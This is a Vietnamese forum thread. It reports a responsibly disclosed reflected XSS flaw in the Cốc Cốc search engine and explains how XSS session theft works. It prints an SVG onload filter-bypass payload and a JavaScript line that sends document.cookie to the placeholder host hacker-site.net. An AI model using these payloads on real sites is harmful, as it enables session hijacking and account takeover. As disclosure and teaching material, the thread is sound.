Hướng dẫn và Thảo luận  Trình duyệt Cốc Cốc bị học sinh lớp 8 phát hiện lỗ hổng XSS

VNZ-ROAD
Cross Site Scripting (XSS) là một trong những tấn công phổ biến và dễ bị tấn công nhất mà tất cả các Tester có kinh nghiệm đều biết đến. Nó được coi là một trong những tấn công nguy hiểm nhất đối với các ứng dụng web và có thể mang lại những hậu quả nghiêm trọng. Cuộc tấn công XSS là một đoạn mã độc, để khái thác lỗ hổng XSS, hacker sẽ chèn mã độc thông qua các đoạn script để thực thi chúng ở phía Client. Thông thường, các cuộc tấn công XSS được sử dụng để vượt qua truy cập và mạo danh người dùng.


Trong một bài viết chia sẻ trong nhóm J2team trên mạng xã hội Facebook , tài khoản Nguyễn Bình Tây , xưng là học sinh lớp 8 đã Reflected XSS trình duyệt nổi tiếng có hơn 28 triệu người dùng tại Việt Nam cốc cốc. Rất may cho cốc cốc , bạn ấy không có mục đích xấu nên thông báo cho đội ngũ cốc cốc khắc phục. Hiện lỗi này đã được fix . Dưới đây là nguyên văn bài chia sẻ của bạn học sinh lớp 8

Reflected XSS trên công cụ tìm kiếm được 24 triệu người Việt Nam tin dùng - Cốc Cốc lại được phát hiện ra bởi .... em - 1 thằng học sinh lớp 8.
Em cũng sẽ chẳng tìm được nó nếu như hôm nay không có quảng cáo "Cốc Cốc - Niềm tin của người Việt" hiện lên trên Youtube.

Thì cũng như các browser khác, Cốc Cốc cũng có bảo mật về vấn đề này. Nhưng chỉ cần bypass bằng Svg payload như sau là nó sẽ dính XSS:
<svg/onload=alert(document.domain)>
Vâng và nó đã bypass được bộ lọc xss và hiển thị hộp thoại.

Để chắc chắn, em cũng đã thử vào Cốc Cốc tìm kiếm bằng Chrome và Firefox. Sau khi biết "thằng" browser này bị ăn quả XSS, em đã không ngại ngần gửi mail báo cáo cho các admin để xử lí cái này. Và giờ nó đã chính thức bị fix.
Timeline:
  • 12h30 trưa ngày 12/2/2020 : Phát hiện bug
  • 3h55 chiều cùng ngày : Báo cáo admin Cốc Cốc
  • 4h01 : Admin cảm ơn và bảo khi fix xong sẽ báo cáo lại
  • 6h19 : Admin thông báo chính thức đã bị fix và bounty bằng 1 câu:
Dạ, cảm ơn bạn rất nhiều vì đã thông báo kịp thời vấn đề về cho Cốc Cốc ạ




Nguồn J2team

Mục đích cuộc tấn công này là ăn cắp dữ liệu nhận dạng của người dùng như: cookies, session tokens và các thông tin khác. Trong hầu hết các trường hợp, cuộc tấn công này đang được sử dụng để ăn cắp cookie của người khác. Như chúng ta biết, cookie giúp chúng tôi đăng nhập tự động. Do đó với cookie bị đánh cắp, chúng tôi có thể đăng nhập bằng các thông tin nhận dạng khác. Và đây là một trong những lý do, tại sao cuộc tấn công này được coi là một trong những cuộc tấn công nguy hiểm nhất.


Tấn công XSS đang được thực hiện ở phía client. Nó có thể được thực hiện với các ngôn ngữ lập trình phía client khác nhau. Tuy nhiên, thường xuyên nhất cuộc tấn công này được thực hiện với Javascript và HTML.

Reflected XSS

Có nhiều hướng để khai thác thông qua lỗi Reflected XSS, một trong những cách được biết đến nhiều nhất là chiếm phiên làm việc (session) của người dùng, từ đó có thể truy cập được dữ liệu và chiếm được quyền của họ trên website. Chi tiết được mô tả qua những bước sau:



  1. Người dùng đăng nhập web và giả sử được gán session:

Set-Cookie: sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4


  1. Bằng cách nào đó, hacker gửi được cho người dùng URL:

[/URL]


Giả sử example.com là website nạn nhân truy cập, hacker-site.net là trang của hacker tạo ra


  1. Nạn nhân truy cập đến URL trên
  2. Server phản hồi cho nạn nhân, kèm với dữ liệu có trong request (đoạn javascript của hacker)
  3. Trình duyệt nạn nhân nhận phản hồi và thực thi đoạn javascript
  4. Đoạn javascript mà hacker tạo ra thực tế như sau:

var i=new Image; i.src=”http://hacker-site.net/”+document.cookie;


Dòng lệnh trên bản chất thực hiện request đến site của hacker với tham số là cookie người dùng:


GET /sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 HTTP/1.1


Host: hacker-site.net


  1. Từ phía site của mình, hacker sẽ bắt được nội dung request trên và coi như session của người dùng sẽ bị chiếm. Đến lúc này, hacker có thể giả mạo với tư cách nạn nhân và thực hiện mọi quyền trên website mà nạn nhân có.
 
Sửa lần cuối bởi điều hành viên:
Trả lời

dammage

Rìu Bạc Đôi
haizaaaa đây là lỗi xss của trang tìm kiếm cốc cốc không phải lỗi của trình duyệt. lỗi này dùng trình duyệt nào vào cốc cốc mà chả dính... admin đặt tiêu đề dễ gây hiểu lầm quá.
hèn gì tui thấy là lạ, cái video nó test bằng coccoc xong bằng chrome rồi firefox tùm lum